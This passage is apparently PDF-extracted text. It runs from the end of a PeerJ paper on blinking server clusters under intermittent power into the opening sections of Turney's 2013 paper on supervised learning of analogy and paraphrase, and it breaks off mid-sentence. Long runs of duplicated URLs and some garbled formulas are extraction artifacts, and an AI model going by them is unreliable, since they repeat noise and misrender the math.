http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://lass.cs.umass.edu/papers/pdf/asplos2011.pdf http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://www.netmanias.com/ko/?m=view&id=cshare_opt&no=5298 http://dx.doi.org/10.7717/peerj-cs.34 Stone B. 2007. Google’s next frontier: renewable energy. New York Times. Available at http://www. nytimes.com/2007/11/28/technology/28google.html? r=0 (accessed 28 November 2007). Tang X, Xu J, Chanson S. 2005. Web content delivery. New York: Springer. Terry D, Theimer M, Petersen K, Demers A, Spreitzer M, Hauser C. 1995. Managing update conflicts in bayou, a weakly connected replicated storage system. In: Proceedings of the symposium on operating systems principles. New York: ACM, 172–183. Tolia N, Wang Z, Marwah M, Bash C, Ranganathan P, Zhu X. 2008. Delivering energy proportionality with non energy-proportional systems: optimizing the ensemble. In: Proceedings of the workshop on power-aware computer systems. New York: ACM. US Environmental Protection Agency. 2007. Report to Congress on server and data center energy efficiency Washington, D.C.: EPA. Verma A, De P, Mann V, Nayak T, Purohit A, Dasgupta G, Kothari R. 2009. BrownMap: enforcing power budget in shared data centers. IBM, Technical Report RI09016. Armonk: IBM. Wolman A, Voelker G, Sharma N, Cardwell N, Karlin A, Levy H. 1999. On the scale and performance of cooperative web proxy caching. In: Proceedings of the symposium on operating systems principles. New York: ACM, 16–31. Wu K-L, Yu PS, Wolf JL. 2001. Segment-based proxy caching of multimedia streams. In: Proceedings of WWW. New York: ACM, 36–44. Xu Q, Huang J, Wang Z, Qian F, Gerber A, Mao Z. 2011. Cellular data network infrastructure characterization and implication on mobile content placement. In: SIGMETRICS. Zeng H, Ellis C, Lebeck A, Vahdat A. 2002. ECOSystem: managing energy as a first class operating system resource. In: Proceedings of the conference on architectural support for programming languages and operating systems. New York: ACM, 123–132. Zhu Q, Chen Z, Tan L, Zhou Y, Keeton K, Wilkes J. 2005a. Hibernator: helping disk arrays sleep through the winter. In: Proceedings of the symposium on operating systems principles. New York: ACM, 177–190. Zhu Q, Chen Z, Tan L, Zhou Y, Keeton K, Wilkes J. 2005b. Power-aware storage cache management. IEEE Transactions on Computers 54(5):587–602 DOI 10.1109/TC.2005.82. Zink M, Suh K, Yu, Kurose J. 2009. Characteristics of YouTube network traffic at a campus network—measurements, models, and implications. Elsevier Computer Networks 53(4):501–514 DOI 10.1016/j.comnet.2008.09.022. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 50/50 https://peerj.com/computer-science/ http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://www.nytimes.com/2007/11/28/technology/28google.html?_r=0 http://dx.doi.org/10.1109/TC.2005.82 http://dx.doi.org/10.1016/j.comnet.2008.09.022 http://dx.doi.org/10.7717/peerj-cs.34 Managing server clusters on intermittent power Introduction Example applications for blink Contributions Blink: Rationale and Overview Blink Prototype Blink hardware platform Blink software architecture BlinkCache: Blinking Memcached Memcached overview Access patterns and performance metrics BlinkCache design alternatives Summary GreenCache: Blinking Multimedia Cache Multimedia cache overview YouTube trace analysis GreenCache design Implementation BlinkCache implementation GreenCache implementation Blink emulator Power signal Evaluation BlinkCache evaluation GreenCache evaluation Related work Applicability of Blinking Conclusion References work_y35s5ut7lrfohfo57zc6wejzyu ---- Distributional Semantics Beyond Words: Supervised Learning of Analogy and Paraphrase Peter D. Turney National Research Council Canada Information and Communications Technologies Ottawa, Ontario, Canada, K1A 0R6 peter.turney@nrc-cnrc.gc.ca Abstract There have been several efforts to extend distributional semantics beyond individual words, to measure the similarity of word pairs, phrases, and sentences (briefly, tuples; ordered sets of words, contiguous or noncontiguous). One way to extend beyond words is to com- pare two tuples using a function that com- bines pairwise similarities between the com- ponent words in the tuples. A strength of this approach is that it works with both rela- tional similarity (analogy) and compositional similarity (paraphrase). However, past work required hand-coding the combination func- tion for different tasks. The main contribution of this paper is that combination functions are generated by supervised learning. We achieve state-of-the-art results in measuring relational similarity between word pairs (SAT analo- gies and SemEval 2012 Task 2) and measur- ing compositional similarity between noun- modifier phrases and unigrams (multiple- choice paraphrase questions). 1 Introduction Harris (1954) and Firth (1957) hypothesized that words that appear in similar contexts tend to have similar meanings. This hypothesis is the founda- tion for distributional semantics, in which words are represented by context vectors. The similarity of two words is calculated by comparing the two cor- responding context vectors (Lund et al., 1995; Lan- dauer and Dumais, 1997; Turney and Pantel, 2010). Distributional semantics is highly effective for measuring the semantic similarity between individ- ual words. On a set of eighty multiple-choice syn- onym questions from the test of English as a for- eign language (TOEFL), a distributional approach recently achieved 100% accuracy (Bullinaria and Levy, 2012). However, it has been difficult to extend distributional semantics beyond individual words, to word pairs, phrases, and sentences. Moving beyond individual words, there are vari- ous types of semantic similarity to consider. Here we focus on paraphrase and analogy. Paraphrase is similarity in the meaning of two pieces of text (Androutsopoulos and Malakasiotis, 2010). Anal- ogy is similarity in the semantic relations of two sets of words (Turney, 2008a). It is common to study paraphrase at the sentence level (Androutsopoulos and Malakasiotis, 2010), but we prefer to concentrate on the simplest type of paraphrase, where a bigram paraphrases a unigram. For example, dog house is a paraphrase of kennel. In our experiments, we concentrate on noun-modifier bigrams and noun unigrams. Analogies map terms in one domain to terms in another domain (Gentner, 1983). The familiar anal- ogy between the solar system and the Rutherford- Bohr atomic model involves several terms from the domain of the solar system and the domain of the atomic model (Turney, 2008a). The simplest type of analogy is proportional anal- ogy, which involves two pairs of words (Turney, 2006b). For example, the pair 〈cook, raw〉 is anal- ogous to the pair 〈decorate, plain〉. If we cook a thing, it is no longer raw; if we decorate a thing, it 353 Transactions of the Association for Computational Linguistics, 1 (2013) 353–366. Action Editor: Patrick Pantel. Submitted 5/2013; Revised 7/2013; Published 10/2013. c©2013 Association for Computational Linguistics. is no longer plain. The semantic relations between cook and raw are similar to the semantic relations between decorate and plain. In the following exper- iments, we focus on proportional analogies. Erk (2013) distinguished four approaches to extend distributional semantics beyond words: In the first, a single vector space representation for a phrase or sentence is computed from the represen- tations of the individual words (Mitchell and Lap- ata, 2010; Baroni and Zamparelli, 2010). In the sec- ond, two phrases or sentences are compared by com- bining multiple pairwise similarity values (Socher et al., 2011; Turney, 2012). Third, weighted inference rules integrate distributional similarity and formal logic (Garrette et al., 2011). Fourth, a single space integrates formal logic and vectors (Clarke, 2012). Taking the second approach, Turney (2012) intro- duced a dual-space model, with one space for mea- suring domain similarity (similarity of topic or field) and another for function similarity (similarity of role or usage). Similarities beyond individual words are calculated by functions that combine domain and function similarities of component words. The dual-space model has been applied to mea- suring compositional similarity (paraphrase recogni- tion) and relational similarity (analogy recognition). In experiments that tested for sensitivity to word order, the dual-space model performed significantly better than competing approaches (Turney, 2012). A limitation of past work with the dual-space model is that the combination functions were hand- coded. Our main contribution is to show how hand- coding can be eliminated with supervised learning. For ease of reference, we will call our approach SuperSim (supervised similarity). With no modifi- cation of SuperSim for the specific task (relational similarity or compositional similarity), we achieve better results than previous hand-coded models. Compositional similarity (paraphrase) compares two contiguous phrases or sentences (n-grams), whereas relational similarity (analogy) does not require contiguity. We use tuple to refer to both con- tiguous and noncontiguous word sequences. We approach analogy as a problem of supervised tuple classification. To measure the relational sim- ilarity between two word pairs, we train SuperSim with quadruples that are labeled as positive and neg- ative examples of analogies. For example, the pro- portional analogy 〈cook, raw, decorate, plain〉 is labeled as a positive example. A quadruple is represented by a feature vector, composed of domain and function similarities from the dual-space model and other features based on corpus frequencies. SuperSim uses a support vector machine (Platt, 1998) to learn the probability that a quadruple 〈a, b, c, d〉 consists of a word pair 〈a, b〉 and an analogous word pair 〈c, d〉. The probability can be interpreted as the degree of relational similar- ity between the two given word pairs. We also approach paraphrase as supervised tuple classification. To measure the compositional simi- larity beween an m-gram and an n-gram, we train the learning algorithm with (m + n)-tuples that are positive and negative examples of paraphrases. SuperSim learns to estimate the probability that a triple 〈a, b, c〉 consists of a compositional bigram ab and a synonymous unigram c. For instance, the phrase fish tank is synonymous with aquarium; that is, fish tank and aquarium have high compositional similarity. The triple 〈fish, tank, aquarium〉 is repre- sented using the same features that we used for anal- ogy. The probability of the triple can be interpreted as the degree of compositional similarity between the given bigram and unigram. We review related work in Section 2. The gen- eral feature space for learning relations and compo- sitions is presented in Section 3. The experiments with relational similarity are described in Section 4, and Section 5 reports the results with compositional similarity. Section 6 discusses the implications of the results. We consider future work in Section 7 and conclude in Section 8. 2 Related Work In SemEval 2012, Task 2 was concerned with mea- suring the degree of relational similarity between two word pairs (Jurgens et al., 2012) and Task 6 (Agirre et al., 2012) examined the degree of seman- tic equivalence between two sentences. These two areas of research have been mostly independent, although Socher et al. (2012) and Turney (2012) present unified perspectives on the two tasks. We first discuss some work on relational similarity, then some work on compositional similarity, and lastly work that unifies the two types of similarity. 354 2.1 Relational Similarity LRA (latent relational analysis) measures rela- tional similarity with a pair–pattern matrix (Turney, 2006b). Rows in the matrix correspond to word pairs (a, b) and columns correspond to patterns that connect the pairs (“a for the b”) in a large cor- pus. This is a holistic (noncompositional) approach to distributional similarity, since the word pairs are opaque wholes; the component words have no sep- arate representations. A compositional approach to analogy has a representation for each word, and a word pair is represented by composing the represen- tations for each member of the pair. Given a vocabu- lary of N words, a compositional approach requires N representations to handle all possible word pairs, but a holistic approach requires N2 representations. Holistic approaches do not scale up (Turney, 2012). LRA required nine days to run. Bollegala et al. (2008) answered the SAT anal- ogy questions with a support vector machine trained on quadruples (proportional analogies), as we do here. However, their feature vectors are holistic, and hence there are scaling problems. Herdağdelen and Baroni (2009) used a support vector machine to learn relational similarity. Their feature vectors contained a combination of holistic and compositional features. Measuring relational similarity is closely con- nected to classifying word pairs according to their semantic relations (Turney and Littman, 2005). Semantic relation classification was the focus of SemEval 2007 Task 4 (Girju et al., 2007) and SemEval 2010 Task 8 (Hendrickx et al., 2010). 2.2 Compositional Similarity To extend distributional semantics beyond words, many researchers take the first approach described by Erk (2013), in which a single vector space is used for individual words, phrases, and sentences (Lan- dauer and Dumais, 1997; Mitchell and Lapata, 2008; Mitchell and Lapata, 2010). In this approach, given the words a and b with context vectors a and b, we construct a vector for the bigram ab by applying vec- tor operations to a and b. Mitchell and Lapata (2010) experiment with many different vector operations and find that element-wise multiplication performs well. The bigram ab is represented by c = a � b, where ci = ai · bi. However, element-wise multiplica- tion is commutative, so the bigrams ab and ba map to the same vector c. In experiments that test for order sensitivity, element-wise multiplication per- forms poorly (Turney, 2012). We can treat the bigram ab as a unit, as if it were a single word, and construct a context vector for ab from occurrences of ab in a large corpus. This holistic approach to representing bigrams performs well when a limited set of bigrams is specified in advance (before building the word–context matrix), but it does not scale up, because there are too many possible bigrams (Turney, 2012). Although the holistic approach does not scale up, we can generate a few holistic bigram vectors and use them to train a supervised regression model (Guevara, 2010; Baroni and Zamparelli, 2010). Given a new bigram cd, not observed in the corpus, the regression model can predict a holistic vector for cd, if c and d have been observed separately. We show in Section 5 that this idea can be adapted to train SuperSim without manually labeled data. Socher et al. (2011) take the second approach described by Erk (2013), in which two sentences are compared by combining multiple pairwise similar- ity values. They construct a variable-sized similar- ity matrix X, in which the element xij is the sim- ilarity between the i-th phrase of one sentence and the j-th phrase of the other. Since supervised learn- ing is simpler with fixed-sized feature vectors, the variable-sized similarity matrix is then reduced to a smaller fixed-sized matrix, to allow comparison of pairs of sentences of varying lengths. 2.3 Unified Perspectives on Similarity Socher et al. (2012) represent words and phrases with a pair, consisting of a vector and a matrix. The vector captures the meaning of the word or phrase and the matrix captures how a word or phrase mod- ifies the meaning of another word or phrase when they are combined. They apply this matrix–vector representation to both compositions and relations. Turney (2012) represents words with two vectors, a vector from domain space and a vector from func- tion space. The domain vector captures the topic or field of the word and the function vector captures the 355 functional role of the word. This dual-space model is applied to both compositions and relations. Here we extend the dual-space model of Tur- ney (2012) in two ways: Hand-coding is replaced with supervised learning and two new sets of fea- tures augment domain and function space. Moving to supervised learning instead of hand-coding makes it easier to introduce new features. In the dual-space model, parameterized similar- ity measures provided the input values for hand- crafted functions. Each task required a different set of hand-crafted functions. The parameters of the similarity measures were tuned using a customized grid search algorithm. The grid search algorithm was not suitable for integration with a supervised learning algorithm. The insight behind SuperSim is that, given appropriate features, a supervised learn- ing algorithm can replace the grid search algorithm and the hand-crafted functions. 3 Features for Tuple Classification We represent a tuple with four types of features, all based on frequencies in a large corpus. The first type of feature is the logarithm of the frequency of a word. The second type is the positive point- wise mutual information (PPMI) between two words (Church and Hanks, 1989; Bullinaria and Levy, 2007). Third and fourth are the similarities of two words in domain and function space (Turney, 2012). In the following experiments, we use the PPMI matrix from Turney et al. (2011) and the domain and function matrices from Turney (2012).1 The three matrices and the word frequency data are based on the same corpus, a collection of web pages gath- ered from university web sites, containing 5 × 1010 words.2 All three matrices are word–context matri- ces, in which the rows correspond to terms (words and phrases) in WordNet.3 The columns correspond to the contexts in which the terms appear; each matrix involves a different kind of context. 1The three matrices and the word frequency data are avail- able on request from the author. The matrix files range from two to five gigabytes when packaged and compressed for distri- bution. 2The corpus was collected by Charles Clarke at the Univer- sity of Waterloo. It is about 280 gigabytes of plain text. 3See http://wordnet.princeton.edu/ for infor- mation about WordNet. Let 〈x1, x2, . . . , xn〉 be an n-tuple of words. The number of features we use to represent this tuple increases as a function of n. The first set of features consists of log frequency values for each word xi in the n-tuple. Let freq(xi) be the frequency of xi in the corpus. We define LF(xi) as log(freq(xi)+1). If xi is not in the corpus, freq(xi) is zero, and thus LF(xi) is also zero. There are n log frequency features, one LF(xi) feature for each word in the n-tuple. The second set of features consists of positive pointwise mutual information values for each pair of words in the n-tuple. We use the raw PPMI matrix from Turney et al. (2011). Although they computed the singular value decomposition (SVD) to project the row vectors into a lower-dimensional space, we need the original high-dimensional columns for our features. The raw PPMI matrix has 114,501 rows and 139,246 columns with a density of 1.2%. For each term in WordNet, there is a corresponding row in the raw PPMI matrix. For each unigram in Word- Net, there are two corresponding columns in the raw PPMI matrix, one marked left and the other right. Suppose xi corresponds to the i-th row of the PPMI matrix and xj corresponds the j-th column, marked left. The value in the i-th row and j-th col- umn of the PPMI matrix, PPMI(xi, xj, left), is the positive pointwise mutual information of xi and xj co-occurring in the corpus, where xj is the first word to the left of xi, ignoring any intervening stop words (that is, ignoring any words that are not in WordNet). If xi (or xj) has no corresponding row (or column) in the matrix, then the PPMI value is set to zero. Turney et al. (2011) estimated PPMI(xi, xj, left) by sampling the corpus for phrases containing xi and then looking for xj to the left of xi in the sampled phrases (and likewise for right). Due to this sam- pling process, PPMI(xi, xj, left) does not necessar- ily equal PPMI(xj, xi, right). For example, suppose xi is a rare word and xj is a common word. With PPMI(xi, xj, left), when we sample phrases contain- ing xi, we are relatively likely to find xj in some of these phrases. With PPMI(xj, xi, right), when we sample phrases containing xj, we are less likely to find any phrases containing xi. Although, in theory, PPMI(xi, xj, left) should equal PPMI(xj, xi, right), they are likely to be unequal given a limited sample. 356 From the n-tuple, we select all of the n(n − 1) pairs, 〈xi, xj〉, such that i 6= j. We then gener- ate two features for each pair, PPMI(xi, xj, left) and PPMI(xi, xj, right). Thus there are 2n(n−1) PPMI values in the second set of features. The third set of features consists of domain space similarity values for each pair of words in the n-tuple. Domain space was designed to capture the topic of a word. Turney (2012) first constructed a frequency matrix, in which the rows correspond to terms in WordNet and the columns correspond to nearby nouns. Given a term xi, the corpus was sam- pled for phrases containing xi and the phrases were processed with a part-of-speech tagger, to identify nouns. If the noun xj was the closest noun to the left or right of xi, then the frequency count for the i-th row and j-th column was incremented. The hypoth- esis was that the nouns near a term characterize the topics associated with the term. The word–context frequency matrix for domain space has 114,297 rows (terms) and 50,000 columns (noun contexts, topics), with a density of 2.6%. The frequency matrix was converted to a PPMI matrix and then smoothed with SVD. The SVD yields three matrices, U, Σ, and V. A term in domain space is represented by a row vector in UkΣ p k. The parameter k specifies the num- ber of singular values in the truncated singular value decomposition; that is, k is the number of latent factors in the low-dimensional representation of the term (Landauer and Dumais, 1997). We generate Uk and Σk by deleting the columns in U and Σ corresponding to the smallest singular values. The parameter p raises the singular values in Σk to the power p (Caron, 2001). As p goes from one to zero, factors with smaller singular values are given more weight. This has the effect of making the similarity measure more discriminating (Turney, 2012). The similarity of two words in domain space, Dom(xi, xj, k, p), is computed by extracting the row vectors in UkΣ p k that correspond to the words xi and xj, and then calculating their cosine. Optimal per- formance requires tuning the parameters k and p for the task (Bullinaria and Levy, 2012; Turney, 2012). In the following experiments, we avoid directly tun- ing k and p by generating features with a variety of values for k and p, allowing the supervised learning algorithm to decide which features to use. Feature set Size of set LF(xi) n PPMI(xi, xj, handedness) 2n(n−1) Dom(xi, xj, k, p) 1 2 n(n−1)nknp Fun(xi, xj, k, p) 1 2 n(n−1)nknp Table 1: The four sets of features and their sizes. From the n-tuple, we select all 1 2 n(n − 1) pairs, 〈xi, xj〉, such that i < j. For each pair, we gen- erate domain similarity features, Dom(xi, xj, k, p), where k varies from 100 to 1000 in steps of 100 and p varies from 0 to 1 in steps of 0.1. The number of k values, nk, is 10 and the number of p values, np, is 11; therefore there are 110 features, nknp, for each pair, 〈xi, xj〉. Thus there are 12n(n−1)nknp domain space similarity values in the third set of features. The fourth set of features consists of function space similarity values for each pair of words in the n-tuple. Function space was designed to capture the functional role of a word. It is similar to domain space, except the context is based on verbal patterns, instead of nearby nouns. The hypothesis was that the functional role of a word is characterized by the patterns that relate the word to nearby verbs. The word–context frequency matrix for function space has 114,101 rows (terms) and 50,000 columns (verb pattern contexts, functional roles), with a den- sity of 1.2%. The frequency matrix was converted to a PPMI matrix and smoothed with SVD. From the n-tuple, we select all 1 2 n(n − 1) pairs, 〈xi, xj〉, such that i < j. For each pair, we generate function similarity features, Fun(xi, xj, k, p), where k and p vary as they did with domain space. Thus there are 1 2 n(n − 1)nknp function space similarity values in the fourth set of features. Table 1 summarizes the four sets of features and the size of each set as a function of n, the number of words in the given tuple. The values of nk and np (10 and 11) are considered to be constants. Table 2 shows the number of elements in the feature vector, as n varies from 1 to 6. The total number of features is O(n2). We believe that this is acceptable growth and will scale up to comparing sentence pairs. The four sets of features have a hierarchical rela- tionship. The log frequency features are based on counting isolated occurrences of each word in the 357 n-tuple LF PPMI Dom Fun Total 1 1 0 0 0 1 2 2 4 110 110 226 3 3 12 330 330 675 4 4 24 660 660 1348 5 5 40 1100 1100 2245 6 6 60 1650 1650 3366 Table 2: Number of features for various tuple sizes. corpus. The PPMI features are based on direct co- occurrences of two words; that is, PPMI is only greater than zero if the two words actually occur together in the corpus. Domain and function space capture indirect or higher-order co-occurrence, due to the truncated SVD (Lemaire and Denhière, 2006); that is, the values of Dom(xi, xj, k, p) and Fun(xi, xj, k, p) can be high even when xi and xj do not actually co-occur in the corpus. We conjec- ture that there are yet higher orders in this hierarchy that would provide improved similarity measures. SuperSim learns to classify tuples by representing them with these features. SuperSim uses the sequen- tial minimal optimization (SMO) support vector machine (SVM) as implemented in Weka (Platt, 1998; Witten et al., 2011).4 The kernel is a normal- ized third-order polynomial. Weka provides proba- bility estimates for the classes by fitting the outputs of the SVM with logistic regression models. 4 Relational Similarity This section presents experiments with learning rela- tional similarity using SuperSim. The training datasets consist of quadruples that are labeled as positive and negative examples of analogies. Table 2 shows that the feature vectors have 1,348 elements. We experiment with three datasets, a collection of 374 five-choice questions from the SAT col- lege entrance exam (Turney et al., 2003), a modi- fied ten-choice variation of the SAT questions (Tur- ney, 2012), and the relational similarity dataset from SemEval 2012 Task 2 (Jurgens et al., 2012).5 4Weka is available at http://www.cs.waikato.ac. nz/ml/weka/. 5The SAT questions are available on request from the author. The SemEval 2012 Task 2 dataset is available at https:// sites.google.com/site/semeval2012task2/. Stem: word:language Choices: (1) paint:portrait (2) poetry:rhythm (3) note:music (4) tale:story (5) week:year Solution: (3) note:music Table 3: A five-choice SAT analogy question. 4.1 Five-choice SAT Questions Table 3 is an example of a question from the 374 five-choice SAT questions. Each five-choice ques- tion yields five labeled quadruples, by combining the stem with each choice. The quadruple 〈word, lan- guage, note, music〉 is labeled positive and the other four quadruples are labeled negative. Since learning works better with balanced train- ing data (Japkowicz and Stephen, 2002), we use the symmetries of proportional analogies to add more positive examples (Lepage and Shin-ichi, 1996). For each positive quadruple, 〈a, b, c, d〉, we add three more positive quadruples, 〈b, a, d, c〉, 〈c, d, a, b〉, and 〈d, c, b, a〉. Thus each five-choice question pro- vides four positive and four negative quadruples. We use ten-fold cross-validation to apply Super- Sim to the SAT questions. The folds are constructed so that the eight quadruples from each SAT question are kept together in the same fold. To answer a ques- tion in the testing fold, the learned 